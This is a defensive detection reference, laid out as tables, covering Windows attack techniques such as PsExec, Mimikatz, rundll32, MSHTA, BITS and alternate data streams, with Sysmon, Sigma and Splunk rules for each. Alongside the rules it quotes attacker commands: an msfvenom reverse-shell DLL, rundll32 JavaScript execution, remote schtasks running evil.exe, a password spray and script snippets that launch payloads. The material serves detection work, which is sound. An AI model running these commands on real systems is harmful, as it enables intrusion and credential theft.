Links

General

Category
Description
Command/Artifact
WinRM Overview
Windows Remote Management, allows remote system management.
Enabling WinRM
Not enabled by default, requires configuration.
https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management
Common Commands
Commands for remote execution.
Enter-PSSession -Computername <IP> -Credentials (Get-Credential)
Invoke-Command -ComputerName 192.168.1.12 -ScriptBlock {get-childitem} -Credential (Get-Credential)
File operations remotely.
$cred = Get-Credential $session = New-PSSession -ComputerName 192.168.1.12 -Credential $cred Copy-Item -Path C:\entry.txt -Destination c:\temp\entry.txt -ToSession $session
Detection - Host
Artifacts indicating remote PowerShell execution.
EID 6: Attempt to connect using WinRM.
EID 142: WSMan operation CreateShell failed.
EID 161: WSMan disabled on remote server.
EID 162: Incorrect credentials.
EID 16: Closing WSMan shell.
Detection - Remote
Artifacts indicating remote PowerShell execution on the remote machine.
EID 400: Start of connection, includes HostName, HostApplication, RunspaceId.
EID 403: End of connection, matches RunspaceId in EID 400.
EID 600: Details of remote command execution process.
EID 91: Connection succeeded.
Security Log
Security-related artifacts.
EID 4624 Logon Type 3: Shows source workstation of the connection.
Resources
Additional information on WinRM.
https://docs.microsoft.com/en-us/windows/win32/winrm/portal

Component
Description
Malicious Example
Detection Method
WSH (Windows Script Host)
Automation technology for Windows. Supports scripting similar to batch files.
Can be used to execute malicious scripts.
Monitor for unusual script executions or modifications.
Executables (Wscript.exe and Cscript.exe)
Wscript supports GUI, Cscript supports CLI.
Execution of malicious scripts through these executables.
Monitor for unusual activity or command-line arguments in Wscript.exe and Cscript.exe.
VBScript Example
Scripting language supported by WSH.
Set wshShell = CreateObject("WScript.Shell") strUserName = wshShell.ExpandEnvironmentStrings("%USERNAME%") ... objShell.run("C:\Users\"& strUserName &"\AppData\Local\Temp\ransomware.exe") Downloads and executes ransomware.
Use Sysmon to monitor for process creation events involving VBScript files.
JScript Example
Another scripting language supported by WSH.
a = new ActiveXObject('Wscript.Shell'); cmd = "powershell -ep Bypass ..."; a.Run(cmd,0); Executes a PowerShell command to download and run a payload.
Monitor for JScript files executing PowerShell commands or making network calls.
Sysmon Detection
System monitoring tool for Windows.
-
Configure Sysmon to log process creation with command-line details. Look for instances of Cscript.exe or Wscript.exe executing scripts from unusual locations.
Network Monitoring
Observing network traffic for anomalies.
Detecting network calls to known malicious domains or unusual data transfer patterns.
Use network monitoring tools to watch for outbound connections to suspicious IPs or domains.
File System Monitoring
Monitoring file system for changes.
Detecting creation of new, unexpected executable files.
Implement file integrity monitoring to detect changes in system directories or creation of new executables.

Scenario
Command/Code
Description
Detection Method
Create Scheduled Task
$InterfaceNumber = 7 $Path = $env:APPDATA + "\Output.pcap" $Action = New-ScheduledTaskAction -Execute 'C:\Program Files\Wireshark\tshark.exe' -Argument " -i $InterfaceNumber -w $Path -a duration:10" $Trigger = New-ScheduledTaskTrigger -Once -At "8/26/2019 4:00:00 AM" $setting = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "Tshark Network Traffic" -Description "Run Tshark" -Settings $setting
PowerShell script to create a scheduled task for running Tshark.
Monitor for PowerShell script executions that register new scheduled tasks.
List Scheduled Tasks
`$Tasks = Get-ScheduledTask -TaskPath \
select TaskName,Actions,Triggers<br>foreach($task in $Tasks){<br>$task.TaskName
Out-String<br>$task.Actions
Create Task on Remote Machine
SCHTASKS /Create /S [Remote Machine Hostname] /U domain\user /P password /SC Daily /Evil /TR c:\evil.exe /ST 18:30
Command to create a scheduled task on a remote machine to execute a potentially malicious file.
Monitor for remote task creation commands, especially those specifying unusual or unknown executables.
Scheduled Task XML File
XML configuration file for a scheduled task.
The XML file is created by the PowerShell script and defines the task settings.
Monitor for creation or modification of XML files in C:\Windows\System32\Tasks and C:\Windows\Tasks.
Detection with Sysmon
-
-
Configure Sysmon to log file creation events in the scheduled tasks directories and monitor for process creation events involving cmd.exe with schtasks.exe in the command line, or PowerShell executing scheduled task cmdlets.
Scenario
Command/Code
Description
Detection Method
Create Malicious DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[Port] -f dll -o evil.dll
Using Metasploit's msfvenom to create a reverse TCP meterpreter DLL.
Monitor for the creation of new DLL files, especially those generated by known tools like msfvenom.
Run DLL with Rundll32
rundll32 \\webdavserver\evil.dll,entrypoint rundll32 C:\evil.dll,EntryPoint rundll32 shell32.dll,Control_RunDLL C:\evil.dll
Commands to execute a DLL using Rundll32.
Monitor for Rundll32 executions with unusual command-line arguments, especially loading DLLs from suspicious paths.
Run JavaScript with Rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -c new-item c:\\users\\noname\\desktop\\testrund.txt",0);window.close();
Using Rundll32 to execute JavaScript that runs a PowerShell command.
Monitor for Rundll32 executing JavaScript, especially those that invoke PowerShell or other scripting engines.
Sysmon Detection - Process Creation
-
-
Configure Sysmon to log Rundll32 process creation events, especially with cmd.exe as the parent process.
Sysmon Detection - Module Loading
-
-
Monitor for Rundll32 loading specific modules like ws2_32.dll, which could indicate network activity.
Sysmon Detection - Network Connection
-
-
Monitor for network connections initiated by Rundll32 processes.
Sysmon Rule Example
<Sysmon schemaversion="4.00"> <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms> <EventFiltering> <ProcessCreate onmatch="include"> <Image condition="contains">Rundll32.exe</Image> </ProcessCreate> <NetworkConnection> <Image condition="contains">Rundll32.exe</Image> </NetworkConnection> <ImageLoad onmatch="include"> <ImageLoaded condition="contains">ws2_32.dll</ImageLoaded> </ImageLoad> </EventFiltering> </Sysmon>
Example Sysmon rule for monitoring Rundll32 activities.
Implement this Sysmon rule to detect suspicious Rundll32 activities. Note: This rule is for demonstration and should be customized for specific environments.

Stage
Command/Code
Description
Detection Method
Discovery
$ nmap -sC -sV 192.168.1.7
Using Nmap to discover services on a target machine, identifying potential services vulnerable to password spraying.
Monitor for multiple, rapid connection attempts or port scans from a single IP address.
Password Spray Attack
./spray.sh -smb 192.168.1.7 users.txt passwords.txt 0 0 WORKGROUP
Executing a password spray attack against SMB service using a list of usernames and passwords.
Monitor for multiple failed login attempts across different user accounts within a short time frame.
Detection with Windows Security Events
source="WinEventLog:Security" earliest=-10m AND EventCode="4625" | stats count(EventCode) by Source_Network_Address,Account_Name | sort - count | where Account_Name != "-"
Using Splunk to search for multiple failed login attempts (Event ID 4625) from the same IP address.
Set up alerts for multiple login failures (Event ID 4625) from the same source IP against different user accounts.
Analyzing Event Patterns
source="WinEventLog:Security" earliest=-10m | stats list(EventCode) as c_list BY Account_Name
Analyzing the sequence of Windows Security Event IDs to detect a pattern of failed logins followed by a success.
Look for patterns where multiple login failures for a user are followed by a successful login, indicating potential account compromise.

Stage
Command/Code
Description
Detection Method
PsExec Execution
.\PsExec.exe \\DESKTOP-QTEKH69 -u <username> -p <password> powershell
Command to execute a process remotely using PsExec.
Monitor for PsExec execution patterns, especially with command-line arguments indicating remote execution.
Network Login
-
PsExec authenticates to the target device, creating a network login event.
Monitor for Event ID 4624 with logon type 3, indicating a network login.
File Creation on ADMIN$
-
PsExec connects to ADMIN$ share to drop PSEXESVC.exe.
Use Sysmon to monitor for file creation events, especially the creation of PSEXESVC.exe in C:\Windows.
Service Creation
-
PsExec starts the PSEXESVC service on the target.
Monitor for Event ID 4697 and registry key creation for new services, particularly PSEXESVC.
Named Pipe Creation
-
PsExec creates multiple named pipes for communication.
Monitor for the creation of named pipes, especially those containing PSEXESVC.
Sysmon Detection Rules
<Sysmon schemaversion="4.22"> ... <FileCreate onmatch="include"> <TargetFilename name="PSEXEC" condition="contains">C:\Windows\PSEXESVC.exe</TargetFilename> </FileCreate> ... <PipeEvent onmatch="include"> <PipeName name="PSEXEC" condition="contains">PSEXESVC</PipeName> </PipeEvent> ... <RegistryEvent onmatch="include"> <TargetObject name="PSEXEC" condition="contains">\SYSTEM\CurrentControlSet\Services\PSEXESVC</TargetObject> </RegistryEvent> ...</Sysmon>
Example Sysmon rules for monitoring PsExec activities.
Implement these Sysmon rules to detect suspicious PsExec activities.
Suricata Detection Rule
`alert smb any any -> $HOME_NET any (msg: "PSEXEC"; content: "
50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 65 00 78 00 65 00
" ; sid:22000005;rev:1;)`

Stage
Command/Code
Description
Detection Method
Execution of Mimikatz
mimikatz.exe Invoke-Mimikatz Invoke-PSImage Dump the LSASS and send it over network
Various methods to execute Mimikatz, including direct execution, PowerShell scripts, and dumping LSASS process memory.
Monitor for process creation, PowerShell script execution, and LSASS memory dumping activities.
Process Access to LSASS
-
Mimikatz accesses the LSASS process to extract credentials.
Use Sysmon to monitor for unauthorized access to the LSASS process.
Module Loading
-
Mimikatz loads specific modules like vaultcli.dll and bcryptprimitives.dll.
Monitor for the loading of these modules, which can indicate credential dumping activities.
Sysmon Detection Rules
<Sysmon schemaversion="4.00"> ... <ProcessAccess onmatch="include"> <SourceImage condition="contains">mimikat</SourceImage> <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage> </ProcessAccess> ... <ImageLoad onmatch="include"> <ImageLoaded condition="contains">vaultcli.dll</ImageLoaded> <ImageLoaded condition="contains">bcryptprimitives.dll</ImageLoaded> </ImageLoad> ...</Sysmon>
Example Sysmon rules for monitoring Mimikatz activities.
Implement these Sysmon rules to detect suspicious Mimikatz activities.
PowerShell Logging
-
PowerShell logging can capture script execution, including Mimikatz scripts.
Enable PowerShell script block logging to capture the execution of scripts like Invoke-Mimikatz.
Dump LSASS using Procdump
-
Using Procdump to dump LSASS process memory, which can then be analyzed by Mimikatz.
Monitor for the execution of Procdump with command-line arguments targeting LSASS.
Invoke-PSImage Detection
-
Detection of Invoke-PSImage, a method to execute PowerShell scripts hidden in images.
Monitor for PowerShell script block logging containing aliases like Sal and the downloading of .png images from the internet.
Protection Against Password Dumping
-
Microsoft's LSA protection and Credential Guard.
Ensure LSA protection is enabled and Credential Guard is deployed to obfuscate credentials in memory.
Attack Type
Description
Detection Method
VBA Macros
Malicious macros embedded in Office documents.
Monitor registry edits for \Security\Trusted indicating a user has trusted a document. Use Sysmon to track registry changes.
Dynamic Data Exchange (DDE)
Method enabling Office applications to get data from another application, potentially executing malicious commands.
Monitor Microsoft Office Alerts (OAlerts.evtx) for Event ID 300 indicating execution of unexpected commands.
Object Linking & Embedding (OLE)
Feature allowing the creation of objects in one application and embedding them in another, potentially leading to buffer overflow vulnerabilities.
Monitor process creation where the parent process is in the Microsoft Office directory, indicating potential OLE exploitation.

Detection Techniques

VBA Macros
- **Registry Monitoring**:
- Path: `HKCU\Software\Microsoft\Office\<Version>\Word\Security\Trusted Documents\TrustRecords`
- Sysmon Rule:
```xml
<Sysmon schemaversion="4.00">
<EventFiltering>
<RegistryEvent default="include">
<TargetObject condition="contains">\Security\Trusted</TargetObject>
</RegistryEvent>
</EventFiltering>
</Sysmon>
```
- RegRipper Plugin: `trusterecords` to display files trusted in Microsoft Office.
#### Dynamic Data Exchange (DDE)
- **Windows Event Monitoring**:
- Path: `C:\Windows\System32\winevt\Logs\OAlerts.evtx`
- Event ID: 300
- Note: Check recently opened files in Windows or Microsoft Word's recent folder for suspicious documents.
#### Object Linking & Embedding (OLE)
- **Sysmon Process Creation Monitoring**:
- Detect parent processes in the Microsoft Office directory.
- Sysmon Rule:
```xml
<Sysmon schemaversion="4.00">
<EventFiltering>
<ProcessCreate default="include">
<ParentImage condition="contains">Microsoft Office\Office</ParentImage>
</ProcessCreate>
</EventFiltering>
</Sysmon>
```
- **Digital Forensics**:
- Registry Path: `HKCU\Software\Microsoft\Office\<Version>\Word\File MRU`
- Focus on the Most Recently Used (MRU) list to identify potentially malicious Office files.
-----
| Attack Vector | Description | Detection Method |
|---------------|-------------|------------------|
| **MSHTA Execution** | Executes HTML applications, potentially running malicious scripts. | Monitor for the creation of mshta.exe processes, especially with command lines specifying HTA files. |
| **HTA File Execution** | HTA files can contain malicious scripts in VBScript or JScript. | Monitor for the execution of HTA files, especially those downloaded from external sources. |
| **HTA File Execution Tricks** | HTA files appended to other file types to evade detection. | Monitor for mshta.exe executing files with non-standard extensions or unexpected file combinations. |
| **VBScript in HTA** | Using VBScript within HTA files to execute malicious code. | Monitor for VBScript execution within HTA files, particularly those creating or running executables. |
### Detection Techniques
#### MSHTA Execution
- **Sysmon Process Creation Monitoring**:
- Detect mshta.exe process creation with specific file paths or URLs.
- Sysmon Rule:
```xml
<Sysmon schemaversion="4.00">
<EventFiltering>
<ProcessCreate default="include">
<Image condition="contains">mshta.exe</Image>
</ProcessCreate>
</EventFiltering>
</Sysmon>
```
#### HTA File Execution
- **File Monitoring**:
- Monitor for the creation or modification of HTA files, especially those with embedded scripts.
- Look for unusual file behaviors, such as a document file executing mshta.exe.
#### HTA File Execution Tricks
- **File Type Anomaly Detection**:
- Monitor for mshta.exe executing files with non-standard extensions.
- Be alert for files that have been appended with HTA content.
#### VBScript in HTA
- **Script Execution Monitoring**:
- Monitor for the execution of VBScript within HTA files.
- Look for signs of ActiveX objects being used to execute additional payloads.
### General Recommendations
- **Enable Logging**: Ensure detailed logging is enabled for process creation and script execution.
- **Regular Audits**: Conduct regular audits of system logs for signs of mshta.exe usage.
- **User Education**: Educate users about the risks of enabling macros and running unknown HTA files.
- **Endpoint Protection**: Utilize endpoint protection solutions that can detect and block suspicious script executions.
Attack Method
Description
Detection Method
Clearing Logs
Attackers may clear event logs to cover their tracks.
Monitor for Event IDs 1102 (Security) and 104 (System) which indicate log clearing.
Terminate Event Log Process
Suspending or killing the Event Log process to stop logging.
Monitor for the absence of the Event Log service or unexpected termination of the svchost -k LocalServiceNetworkRestricted -p -s eventlog process.
Invoke-Phant0m
A PowerShell script used to kill threads responsible for event logging.
Monitor PowerShell logs (Event ID 4104) for script execution patterns matching Invoke-Phant0m.
Mimikatz event::drop
Mimikatz module used to stop logging of specific events like 1102 and 104.
Monitor for process access patterns and module loading indicative of Mimikatz usage.

Detection Techniques

Clearing Logs
  • Event Log Monitoring:
    • Look for Event ID 1102 in the Security log and Event ID 104 in the System log.
    • Command to check logs:
      Get-WinEvent -ListLog *
Terminate Event Log Process
  • Live Analysis:
    • Check if the Event Log service is running.
    • Monitor for absence or termination of the svchost process associated with the Event Log service.
Invoke-Phant0m
  • PowerShell Script Block Logging:
    • Enable Script Block Logging to capture PowerShell script execution.
    • Look for specific strings or patterns in the script indicative of Invoke-Phant0m.
Mimikatz event::drop
  • Sysmon Process Access Monitoring:
    • Monitor for access to the svchost.exe process associated with the Event Log service.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <EventFiltering>
      <ProcessAccess onmatch="include">
      <TargetImage condition="is">C:\Windows\System32\svchost.exe</TargetImage>
      </ProcessAccess>
      <ImageLoad onmatch="include">
      <ImageLoaded condition="contains">schannel.dll</ImageLoaded>
      <!-- Additional DLLs -->
      </ImageLoad>
      </EventFiltering>
      </Sysmon>

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for critical events, including process creation and termination, script execution, and registry changes.
  • Regular Audits: Conduct regular audits of system logs to identify patterns indicative of tampering.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to event logging.
  • Incident Response Plan: Have an incident response plan in place to address scenarios where event logging is compromised.

Attack Vector
Description
Detection Method
Python Payloads
Base64 encoded Python code executed via command line.
Monitor for Python command lines containing Base64 decoding patterns.
PowerShell Payloads
Base64 encoded PowerShell scripts executed via command line.
Monitor for PowerShell command lines with encodedCommand parameters or Base64 decoding patterns.

Detection Techniques

Python Payloads
  • Sysmon Process Creation Monitoring:
    • Detect Python command lines with Base64 encoded content.
    • Sigma Rule:
      title: Encoded Python Code in cmd
      status: experimental
      logsource:
      category: process_creation
      product: sysmon
      detection:
      selection:
      EventID: 1
      Keywords:
      CommandLine|base64offset|contains: 'exec'
      CommandLine|contains: 'python'
      Filters:
      CommandLine|contains:
      - 'b64decode'
      - 'base64'
      condition: selection AND Keywords AND Filters
      level: critical
PowerShell Payloads
  • Sysmon Process Creation Monitoring:
    • Detect PowerShell command lines with encodedCommand parameters or Base64 decoding functions.
    • Sigma Rule:
      title: PowerShell Encoded Command
      status: experimental
      logsource:
      product: windows
      service: sysmon
      detection:
      selection:
      CommandLine|contains:
      - ' -enc '
      - ' -EncodedCommand '
      - ' -e '
      - 'FromBase64String'
      CommandLine|contains:
      - 'IEX'
      - 'I.E.'
      - '{'
      condition: selection
      level: high

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for command line process creation, especially for PowerShell and Python.
  • Regular Audits: Conduct regular audits of system logs to identify patterns indicative of Base64 encoded payloads.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious command line activities.
  • User Education: Educate users about the risks of executing unknown scripts or command lines.

Attack Vector
Description
Detection Method
Conhost.exe Misuse
conhost.exe can be used to launch other executables, potentially bypassing security controls.
Monitor for process creation events where conhost.exe is the parent image.

Detection Techniques

Conhost.exe Misuse
  • Sysmon Process Creation Monitoring:
    • Detect process creation events where conhost.exe is the parent image.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
      <EventFiltering>
      <ProcessCreate default="include">
      <ParentImage condition="contains">conhost.exe</ParentImage>
      </ProcessCreate>
      </EventFiltering>
      </Sysmon>
    • Note: This rule is for demonstration purposes. In a production environment, it's important to include all process creation events and exclude only specific, known legitimate processes.

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on parent-child process relationships.
  • Regular Audits: Conduct regular audits of system logs to identify unusual parent-child process relationships involving conhost.exe.
  • Threat Hunting: Apply targeted queries to system logs based on specific hypotheses about potential misuse of conhost.exe.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious process execution patterns.

Attack Vector
Description
Detection Method
Malicious CHM Files
CHM files can be modified to include JavaScript or VBScript that executes harmful commands, including PowerShell scripts.
Monitor for process creation events involving hh.exe and subsequent execution of command-line interpreters or PowerShell.

Detection Techniques

Malicious CHM Files
  • Sysmon Process Creation Monitoring:
    • Detect hh.exe process creation with command lines referring to CHM files.
    • Monitor for subsequent cmd.exe or PowerShell process creations with hh.exe as the parent process.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
      <EventFiltering>
      <ProcessCreate default="include">
      <Image condition="contains">hh.exe</Image>
      <ParentImage condition="contains">cmd.exe</ParentImage>
      <ParentImage condition="contains">powershell.exe</ParentImage>
      </ProcessCreate>
      </EventFiltering>
      </Sysmon>

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on hh.exe and its child processes.
  • Regular Audits: Conduct regular audits of system logs to identify unusual process creation patterns involving CHM files.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to CHM file execution.
  • User Education: Educate users about the risks of opening unknown CHM files and the potential security warnings they should heed.

Attack Vector
Description
Detection Method
CMSTP Executing DLLs
Using cmstp.exe to run malicious DLLs.
Monitor for cmstp.exe process creation followed by the loading of unusual DLLs.
CMSTP Executing SCT Files
Using cmstp.exe to execute SCT scriptlets.
Monitor for cmstp.exe process creation with command lines referencing SCT files.
Privilege Escalation via CMSTP
Misusing cmstp.exe for privilege escalation.
Monitor for abnormal patterns of cmstp.exe usage that could indicate privilege escalation attempts.

Detection Techniques

CMSTP Executing DLLs
  • Sysmon Process Creation and Image Load Monitoring:
    • Detect cmstp.exe process creation events.
    • Monitor for subsequent loading of DLLs, especially from unusual paths.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <EventFiltering>
      <ProcessCreate default="include">
      <Image condition="contains">cmstp.exe</Image>
      </ProcessCreate>
      <ImageLoad onmatch="include">
      <Image condition="image">cmstp.exe</Image>
      </ImageLoad>
      </EventFiltering>
      </Sysmon>
CMSTP Executing SCT Files
  • Sysmon Process Creation Monitoring:
    • Detect cmstp.exe process creation with command lines referencing SCT files.
    • Monitor for network connections or file creations following cmstp.exe execution.
Privilege Escalation via CMSTP
  • Behavioral Analysis:
    • Monitor for unusual command-line arguments or behaviors associated with cmstp.exe.
    • Look for signs of privilege escalation, such as cmstp.exe spawning processes with higher privileges.

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for process creation, image load, and command-line execution.
  • Regular Audits: Conduct regular audits of system logs to identify unusual patterns involving cmstp.exe.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to cmstp.exe execution.
  • User Education: Educate users about the risks of executing unknown INF or SCT files and the potential security implications.

Attack Vector
Description
Detection Method
BITS for Malicious Downloads
Using BITS to stealthily download and execute files.
Monitor for BITS-related activities and analyze BITS job creation events.

Detection Techniques

BITS for Malicious Downloads
  • Sysmon Process Creation Monitoring:
    • Detect bitsadmin.exe or PowerShell process creation with BITS-related commands.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <EventFiltering>
      <ProcessCreate default="include">
      <Image condition="contains">bitsadmin.exe</Image>
      <CommandLine condition="contains">start-BitsTransfer</CommandLine>
      </ProcessCreate>
      </EventFiltering>
      </Sysmon>
  • Event Viewer Monitoring:
    • Monitor BITS-Client events under Microsoft-Windows-Bits-Client/Operational.
    • Look for events showing URL downloads, especially from suspicious or unknown sources.
  • Network Intrusion Detection Systems (NIDS):
    • Monitor for network traffic with Microsoft-Bits as the User Agent.
    • Analyze traffic patterns that suggest BITS usage for downloading files from external sources.
  • Analysis of BITS Database:
    • For Windows versions prior to Windows 10, use bits_parser to parse qmgr[0-9].dat files.
    • For Windows 10, use tools like ESEDatabaseViewer to view the BITS database.
  • PowerShell BITS Transfer Monitoring:
    • Monitor for PowerShell commands involving start-BitsTransfer.
    • Similar to bitsadmin.exe, look for BITS job creation and file download activities.

General Recommendations

  • Enable Detailed Logging: Ensure that logging is enabled for process creation, BITS activities, and network traffic.
  • Regular Audits: Conduct regular audits of BITS logs and network traffic to identify unusual download patterns.
  • Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious BITS activities.
  • User Education: Educate users about the risks of unauthorized file downloads and the potential misuse of BITS.
Attack Vector
Description
Detection Method
Malicious Use of ADS
Using ADS to hide and execute malicious scripts, DLLs, or executables.
Monitor for file stream creation and execution of files from ADS.

Detection Techniques

Malicious Use of ADS
  • Sysmon File Stream Creation Monitoring:
    • Detect creation of alternate data streams, especially for executable file types.
    • Sysmon Rule:
      <Sysmon schemaversion="4.00">
      <EventFiltering>
      <FileCreateStreamHash onmatch="include">
      <TargetFilename condition="end with">.bat</TargetFilename>
      <TargetFilename condition="end with">.cmd</TargetFilename>
      <TargetFilename condition="end with">.hta</TargetFilename>
      <TargetFilename condition="end with">.lnk</TargetFilename>
      <TargetFilename condition="end with">.ps1</TargetFilename>
      <TargetFilename condition="end with">.ps2</TargetFilename>
      <TargetFilename condition="end with">.reg</TargetFilename>
      <TargetFilename condition="end with">.jse</TargetFilename>
      <TargetFilename condition="end with">.vb</TargetFilename>
      <TargetFilename condition="end with">.vbe</TargetFilename>
      <TargetFilename condition="end with">.vbs</TargetFilename>
      <TargetFilename condition="end with">.exe</TargetFilename>
      <TargetFilename condition="end with">.dll</TargetFilename>
      <TargetFilename condition="end with">.js</TargetFilename>
      </FileCreateStreamHash>
      </EventFiltering>
      </Sysmon>
    • Note: Exclude known legitimate ADS like Zone.Identifier.
  • Execution Monitoring:
    • Monitor for execution of files from ADS, such as using wmic, wscript, or rundll32.
    • Look for command-line patterns that indicate execution from an ADS.
  • Behavioral Analysis: